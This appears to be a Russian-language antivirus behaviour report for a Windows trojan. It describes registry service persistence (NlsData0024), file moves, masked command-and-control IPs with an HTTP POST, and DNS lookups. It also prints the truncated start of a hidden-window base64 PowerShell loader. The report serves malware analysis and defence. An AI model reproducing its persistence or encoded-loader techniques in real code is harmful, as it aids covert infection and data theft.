Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\NlsData0024] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData0024] 'ImagePath' = '"%WINDIR%\SysWOW64\appmgmts\NlsData0024.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\677.exe
Удаляет следующие файлы
- %HOMEPATH%\677.exe
Перемещает следующие файлы
- %HOMEPATH%\677.exe в %WINDIR%\syswow64\appmgmts\nlsdata0024.exe
Подменяет следующие файлы
- %HOMEPATH%\677.exe
Сетевая активность
Подключается к
- '10#.#17.53.230':443
- '21#.#1.142.238':8080
TCP
Запросы HTTP POST
- http://21#.##.142.238:8080/Ll1fodrb9/xIzB/QuNtke2iGAOKFLs/olAVXLk8B11osBmVBv/rH062Yk/TNRKuMmaOYi/ via 21#.#1.142.238
UDP
- DNS ASK to###meus.com
- DNS ASK cp##s.net
- DNS ASK ty##s2c.com
- DNS ASK th####erservice.com
- DNS ASK ss##e.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...' (со скрытым окном)
